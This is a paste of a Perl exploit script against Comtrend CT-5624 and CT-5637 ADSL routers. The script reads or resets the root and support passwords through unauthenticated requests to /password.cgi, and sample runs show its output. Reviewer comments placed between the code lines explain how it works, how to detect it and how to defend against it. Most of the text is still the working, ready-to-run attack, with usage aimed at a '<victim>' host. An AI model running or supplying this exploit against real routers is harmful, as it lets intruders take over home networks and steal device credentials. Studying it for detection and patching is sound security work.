hackerscommunity

Comtrend CT-5624 remote u:p change/disclosure exploit

Jul 11th, 2015
  1. #!/usr/bin/perl
  2. #
  3. #  [+] Comtrend Router CT-5624 Remote Root/Support Password Disclosure/Change Exploit
  4. #
  5. #  Author: Todor Donev
  6. #  Email: todor.donev@@gmail
  7. #  Type: Hardware
  8. #  Vuln Type: Remote
  9. #
  10. #  Tested:
  11. #  Board ID    : CT-5624
  12. #  Software    : A011-306TSR-C01_R03
  13. #  Bootloader  : 1.0.37-0.7-3
  14. #  ADSL        : A2pB022c3.d20e
  15. #
  16. #  Board ID    : CT-5637
  17. #  Software    : A111-312BTC-C01_R12
  18. #  Bootloader  : 1.0.37-12.1-1
  19. #  ADSL        : A2pB023k.d20k_rc2
  20. #
  21. #####
  22. #  CT-5624 ADSL2+ Ethernet Router
  23. #  The CT-5624 series ADSL2+ compact and high performance Ethernet router
  24. #  provides four 10/100 Ethernet Interfaces, and one ADSL line interface
  25. #  to access the Internet, incorporating LAN or Video on Demand over one
  26. #  ordinary telephone line, at speeds of up to 24 Mbps. It also has full
  27. #  routing capabilities to segment/route IP protocol, and supports advanced
  28. #  security functions.
  29. #####
  30. #
  31. #  playground$ perl comtrend.pl -c 192.168.1.1:80
  32. #  [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit
  33. #  [!] Target: 192.168.1.1:80
  34. #  [o] New root password: root31337
  35. #  [o] New support password: sup31337
  36. #  [*] Successfully !!
  37. ##
  38. #  playground$ perl comtrend.pl -d 192.168.1.1:80
  39. #  [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit
  40. #  [!] Target: 192.168.1.1:80
  41. #  [o] root: root31337
  42. #  [o] support: sup31337
  43. ##
  44. #  playground$ perl comtrend.pl
  45. #  [+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit
  46. #  [!] usg: perl comtrend.pl [-c or -d] <victim>
  47. #  [!]  -d: Disclosure Root/Support password
  48. #  [!]  -c: Change Root/Support password
  49. #
  50. #####
  51. #  Thanks to Tsvetelina Emirska
  52. #  for the help and support which gives me =)
  53. #####
  54. #
  55. #  http://www.ethical-hacker.org/
  56. #  https://www.facebook.com/ethicalhackerorg
  57.  
  58. use LWP::Simple;
  # Script body (numbered lines are the original paste, unchanged; unnumbered
  # "#" lines are reviewer annotation).
  # It prints a banner, then reads "<mode> <host[:port]>" pairs from @ARGV.
  # What the code demonstrates: every request below is a plain LWP::Simple
  # get() and the script supplies no credentials, so the device's
  # /password.cgi is being treated as reachable without logging in.
  # Defensive takeaways: keep the router's web management interface
  # unreachable from untrusted networks, check with the vendor for fixed
  # firmware (none is named on this page), and treat unexpected requests for
  # /password.cgi in HTTP logs as an indicator worth investigating.
  # NOTE(review): there is no `use strict` / `use warnings`; $type, $t and
  # $result are package globals, and the "-c" block after the loop relies on
  # the values left in $type and $t.
  59. print "[+] Comtrend CT5624 Router Remote Root/Support Password Disclosure/Change Exploit\n";
  # With no arguments, show usage; usg() calls exit, so nothing below runs.
  60. if (@ARGV == 0) {&usg;}
  # Arguments are consumed two at a time: the mode flag, then the target.
  61. while (@ARGV > 0) {
  62. $type = shift(@ARGV);
  63. $t = shift(@ARGV);
  # "-d": read-only path. Fetches password.cgi and dies when get() returns a
  # false value (undef on failure; an empty body is also false).
  64. if ($type eq "-d") {
  65. my $r = get("http://$t/password.cgi") or die("suck!");
  66. print "[!] Target: $t\n";
  # The patterns pull the quoted values assigned to pwdAdmin / pwdSupport out
  # of the response body; going by the sample run in the header, these appear
  # to be the account passwords returned in cleartext.
  # Both matches use /g in scalar context on the same $r, so the second search
  # resumes from where the first match ended: statement order matters here.
  67. if ($r =~ m/pwdAdmin = '(.*)';/g) {
  68. $result .= "[o] root: $1\n";
  69. }    
  70. if ($r =~ m/pwdSupport = '(.*)';/g) {
  71. $result .= "[o] support: $1\n";
  # Output is printed only inside the pwdSupport branch, and $result is never
  # reset, so it accumulates across loop iterations.
  72. print $result;
  # The three braces close the pwdSupport if, the "-d" if and the while loop.
  73. }}}
  # "-c": state-changing path. It sits after the while loop, so it acts only
  # on the last mode/target pair that was shifted above.
  74. if ($type eq "-c") {
  75. print "[!] Target: $t\n";
  76. print "[o] New root password: ";
  77. my $rootpass=<STDIN>;
  78. chomp($rootpass);
  79. print "[o] New support password: ";
  80. my $suppass=<STDIN>;
  81. chomp($suppass);
  # The new values travel as sysPassword / sptPassword query parameters of an
  # http:// GET, with no credentials supplied by the script: they cross the
  # network in cleartext and can end up in proxy or server logs. For
  # defenders, a GET for /password.cgi carrying these parameters is a strong
  # detection signal.
  82. my $r = get("http://$t/password.cgi?sysPassword=$rootpass&sptPassword=$suppass") or die("suck!");
  # Success is inferred from the response echoing the new value as pwdAdmin;
  # $rootpass is interpolated into the pattern as-is, so regex metacharacters
  # in it are not escaped.
  83. if ($r =~ m/pwdAdmin = '$rootpass';/g) {
  84. print "[*] Successfully !!\n";
  85. }}
  # Print the command-line help for the script and terminate.
  # Takes no arguments (empty prototype) and never returns to the caller:
  # exit is called without a value, so the process ends with status 0.
  sub usg() {
      my @help_lines = (
          "[!] usg: perl comtrend.pl [-c or -d] <victim>\n",
          "[!]  -d: Disclosure Root/Support password\n",
          "[!]  -c: Change Root/Support password\n",
      );
      print @help_lines;
      exit;
  }